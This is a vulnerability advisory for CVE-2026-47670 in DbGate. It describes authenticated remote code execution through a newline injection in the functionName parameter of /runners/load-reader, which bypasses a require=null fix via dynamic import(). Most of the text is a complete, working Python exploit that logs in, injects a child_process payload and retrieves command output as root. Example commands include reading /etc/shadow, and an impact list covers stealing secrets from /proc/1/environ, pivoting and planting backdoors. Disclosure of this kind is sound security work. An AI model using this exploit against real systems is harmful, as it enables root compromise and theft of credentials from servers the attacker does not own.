CVE-2026-47670
Authenticated Remote Code Execution via loadReader functionName code injection in DbGate
Description
### Summary DbGate is vulnerable to authenticated Remote Code Execution (RCE). Any user with valid DbGate credentials can execute arbitrary OS commands as root by exploiting an unsanitized `functionName` parameter in the `/runners/load-reader` endpoint. The `require = null` mitigation is trivially bypassed via dynamic `import()`. <br/> ### Details **Code injection via `functionName` in loadReader** The `/runners/load-reader` endpoint interpolates the `functionName` parameter directly into a dynamically generated JavaScript script template without any sanitization: ```javascript // packages/api/src/controllers/runners.js (loadReader / loaderScriptTemplate) const reader = await dbgateApi.${functionName}({...}); ``` By injecting a newline character into `functionName`, an attacker breaks out of the template expression and injects arbitrary JavaScript code. The injected code uses `await import('child_process')` to bypass the `require = null` mitigation (since `import()` is a language keyword, not a function that can be nullified), achieving arbitrary command execution as the process user (root in Docker). The June 2025 security fix ([commit cf3f95c](https://github.com/dbgate/dbgate/commit/cf3f95c952)) added `require = null` to the generated script, but this is trivially bypassed: ```javascript // Mitigation in generated script: require = null; // Bypass via dynamic import (language keyword, cannot be nullified): const { execSync } = await import('child_process'); execSync('arbitrary command'); ``` **Root cause:** `functionName` is user-controlled input that is interpolated into code without sanitization. The fix should validate `functionName` against an allowlist of known reader functions (e.g., `/^[a-zA-Z]+$/`) or use a lookup table instead of string interpolation. <br/> ### PoC The PoC can be run against a test environment using Docker Compose: ```yaml services: sectest-dbgate: image: dbgate/dbgate:7.1.4-alpine ports: - "80:3000" environment: LOGINS: admin LOGIN_PASSWORD_admin: SuperSecretPassword123 WEB_ROOT: / CONNECTIONS: con1 LABEL_con1: MySQL SERVER_con1: sectest-mysql USER_con1: dbuser PASSWORD_con1: dbpassword PORT_con1: 3306 ENGINE_con1: mysql@dbgate-plugin-mysql sectest-mysql: image: mysql:8.0 environment: MYSQL_ROOT_PASSWORD: rootpass MYSQL_DATABASE: testdb MYSQL_USER: dbuser MYSQL_PASSWORD: dbpassword ``` PoC Script: ```python #!/usr/bin/env python3 """ DBGate — Authenticated RCE PoC =============================== Root-level command execution against auth-enabled DBGate with valid credentials. Vulnerability — RCE via loadReader functionName code injection The /runners/load-reader endpoint interpolates `functionName` directly into a dynamically generated JS script without sanitization. A newline in functionName breaks out of the template expression and allows arbitrary code execution as root (Docker default). The `require = null` mitigation added in June 2025 is trivially bypassed via dynamic `import()` (a language keyword, not a function). Affected versions: All DbGate versions (tested on 6.1.4, 6.2.0, 7.1.4) Fixed in: NOT FIXED as of DbGate 7.1.4 Tested on: dbgate/dbgate:7.1.4-alpine """ import argparse import json import sys import time import uuid import requests requests.packages.urllib3.disable_warnings() COMMON_ROOTS = ["", "/dbgate", "/db", "/admin", "/gate", "/app"] def banner(host, command, user): print(f""" ┌─────────────────────────────────────────────────────┐ │ DBGate — Authenticated RCE PoC │ │ loadReader functionName code injection │ │ Affects ALL versions (unpatched as of 7.1.4) │ └─────────────────────────────────────────────────────┘ Target : {host} User : {user} Command: {command} """) def build_base(host, port=None): if "://" not in host: host = f"http://{host}" scheme, rest = host.split("://", 1) rest = rest.rstrip("/") slash = rest.find("/") if slash == -1: hostport, path = rest, "" else: hostport, path = rest[:slash], rest[slash:] if port: hostport = hostport.rsplit(":", 1)[0] + f":{port}" elif ":" not in hostport: hostport += ":80" return f"{scheme}://{hostport}", path def discover_web_root(base_host, explicit_path=""): if explicit_path: return f"{base_host}{explicit_path}" for root in COMMON_ROOTS: url = f"{base_host}{root}" try: r = requests.post(f"{url}/config/get", json={}, timeout=3, verify=False) if r.status_code == 200 and "version" in r.text: if root: print(f" [+] Auto-detected WEB_ROOT: {root}") return url except Exception: pass return base_host def phase1_recon(base): print("[Phase 1] Reconnaissance") info = {} try: r = requests.post(f"{base}/config/get", json={}, timeout=5, verify=False) if r.status_code == 200: cfg = r.json() info["config"] = cfg version = cfg.get("version", "?") print(f" [+] Version : {version}") print(f" [+] Docker : {cfg.get('isDocker', '?')}") print(f" [+] Data dir : {cfg.get('connectionsFilePath', '?').rsplit('/', 1)[0]}") except Exception: print(f" [!] /config/get failed") try: r = requests.post(f"{base}/auth/get-providers", json={}, timeout=5, verify=False) if r.status_code == 200: pdata = r.json() info["providers"] = pdata providers = pdata.get("providers", []) names = [p.get("name", "?") for p in providers] default = pdata.get("default", "?") print(f" [+] Auth : {', '.join(names)} (default: {default})") info["default_amoid"] = default except Exception: pass print() return info def phase2_authenticate(base, info, user, password): print("[Phase 2] Authentication") amoid = info.get("default_amoid", "logins") try: r = requests.post( f"{base}/auth/login", json={"amoid": amoid, "login": user, "password": password}, timeout=5, verify=False, ) if r.status_code == 200: data = r.json() token = data.get("accessToken") if token: print(f" [+] Authenticated as '{user}'") print(f" [+] JWT obtained: {token[:50]}...") print() return token else: error = data.get("error", "no accessToken in response") print(f" [-] Login failed: {error}") else: print(f" [-] Login failed (HTTP {r.status_code})") except Exception as e: print(f" [!] Login error: {e}") print() return None def phase3_rce(base, token, command): """ RCE via loadReader functionName code injection. functionName is interpolated into a JS script template: const reader = await dbgateApi.{functionName}({...}); A newline in functionName breaks out and injects arbitrary code. import() bypasses the require=null mitigation (import is a keyword). """ print("[Phase 3] RCE via loadReader code injection") print(f" [*] Command: {command}") uid = uuid.uuid4().hex[:12] jslout = f"/tmp/_rce_{uid}.jsonl" escaped_cmd = (command .replace("\\", "\\\\") .replace("'", "\\'") .replace("`", "\\`")) payload_fn = ( "csvReader\n" "var _r = (await import('child_process'))" f".execSync('{escaped_cmd}',{{timeout:30000}})" ".toString();\n" "var NL = String.fromCharCode(10);\n" "var _hdr = JSON.stringify({__isStreamHeader:true," "columns:[{columnName:'out'}]});\n" "var _rows = _r.split(NL)" ".filter(function(l){return l.length>0})" ".map(function(l){return JSON.stringify({out:l})})" ".join(NL);\n" f"(await import('fs')).writeFileSync('{jslout}'," " _hdr + NL + _rows + NL);\n" "//" ) headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json", } print(f" [*] Injecting payload via functionName (bypasses require=null)") try: r = requests.post( f"{base}/runners/load-reader", json={"functionName": payload_fn, "props": {}}, headers=headers, timeout=35, verify=False, ) print(f" [*] Payload sent (status {r.status_code})") except requests.exceptions.Timeout: print(f" [*] Payload sent (timed out — command may still be running)") except requests.exceptions.ConnectionError: print(f" [*] Payload sent (connection reset — expected for some versions)") except Exception as e: print(f" [!] Send error: {e}") return None print(f" [*] Waiting for execution...") for wait in [0.5, 1, 1.5, 2, 3, 5]: time.sleep(wait) try: r = requests.post( f"{base}/jsldata/get-rows", json={"jslid": f"file://{jslout}", "offset": 0, "limit": 10000}, headers=headers, timeout=5, verify=False, ) if r.status_code == 200: rows = r.json() if isinstance(rows, list) and len(rows) > 0: print(f" [+] Output captured ({len(rows)} lines)") print() return "\n".join( row.get("out", "") for row in rows if isinstance(row, dict) ) except requests.exceptions.ConnectionError: try: time.sleep(1) r = requests.post( f"{base}/jsldata/get-rows", json={"jslid": f"file://{jslout}", "offset": 0, "limit": 10000}, headers=headers, timeout=5, verify=False, ) if r.status_code == 200: rows = r.json() if isinstance(rows, list) and len(rows) > 0: print(f" [+] Output captured ({len(rows)} lines, after reconnect)") print() return "\n".join( row.get("out", "") for row in rows if isinstance(row, dict) ) except Exception: pass except Exception: pass print(f" [-] Could not retrieve output (command may have failed)") print() return None def main(): p = argparse.ArgumentParser( add_help=False, description="DBGate — Authenticated RCE PoC (loadReader code injection)", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=( "Any authenticated DbGate user can escalate to root-level\n" "command execution via unsanitized functionName injection.\n" "This vulnerability is UNPATCHED as of DbGate 7.1.4.\n" "\n" "examples:\n" " %(prog)s -t localhost -u admin -P 'password' -c 'id'\n" " %(prog)s -t 10.0.0.5:3000 -u admin -P 's3cret' -c 'cat /etc/shadow'\n" " %(prog)s -t target.internal/dbgate -u admin -P 'pass' -c 'env'\n" ), ) p.add_argument("-t", "--target", required=True, help="Target host[:port]") p.add_argument("-u", "--user", required=True, help="DbGate username") p.add_argument("-P", "--password", required=True, help="DbGate password") p.add_argument("-c", "--command", required=True, help="OS command to execute") p.add_argument("-p", "--port", type=int, default=None, help="Override port") if len(sys.argv) == 1: p.print_help() sys.exit(1) args = p.parse_args() base_host, path = build_base(args.target, args.port) banner(base_host, args.command, args.user) base = discover_web_root(base_host, path) print(f" [*] API endpoint : {base}") print() info = phase1_recon(base) if not info.get("config"): print("[!] Cannot reach target — verify host/port/web-root") sys.exit(1) token = phase2_authenticate(base, info, args.user, args.password) if not token: print("[!] Authentication failed — check username/password") sys.exit(1) output = phase3_rce(base, token, args.command) if output is not None: print("─" * 60) print(output.rstrip()) print("─" * 60) print() print("[+] RCE successful: authenticated user → root command execution") else: print("[!] No output captured (command may have failed or timed out)") sys.exit(1) if __name__ == "__main__": main() ``` And running the PoC Python script (requires valid credentials): ```python python3 poc.py -t http://localhost -u admin -P 'SuperSecretPassword123' -c 'id' ``` Terminal output: ``` ┌─────────────────────────────────────────────────────┐ │ DBGate — Authenticated RCE PoC │ │ loadReader functionName code injection │ │ Affects ALL versions (unpatched as of 7.1.4) │ └─────────────────────────────────────────────────────┘ Target : http://localhost:80 User : admin Command: id [*] API endpoint : http://localhost:80 [Phase 1] Reconnaissance [+] Version : 7.1.4 [+] Docker : True [+] Data dir : /root/.dbgate [+] Auth : Login & Password (default: logins) [Phase 2] Authentication [+] Authenticated as 'admin' [+] JWT obtained: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhbW9pZCI6I... [Phase 3] RCE via loadReader code injection [*] Command: id [*] Injecting payload via functionName (bypasses require=null) [*] Payload sent (status 500) [*] Waiting for execution... [+] Output captured (1 lines) ──────────────────────────────────────────────────────────── uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) ──────────────────────────────────────────────────────────── [+] RCE successful: authenticated user → root command execution ``` <br/> ### Impact - **Privilege escalation to root** — an authenticated DbGate user escalates from web UI access to a root OS shell inside the container - **Infrastructure secret theft** — `/proc/1/environ` exposes all container environment variables, which may include API keys, cloud tokens, and secrets beyond database credentials that are not visible through the DbGate UI - **Other users' credentials** — extracts `LOGIN_PASSWORD_*` env vars for all DbGate users, enabling password-reuse attacks against other systems - **Network pivot** — from inside the container, the attacker can scan and reach other services on the network that are not exposed externally - **Persistent backdoor** — root access allows modifying the DbGate application itself (e.g. `bundle.js`), installing cron jobs, or adding SSH keys — the backdoor survives credential rotation and DbGate restarts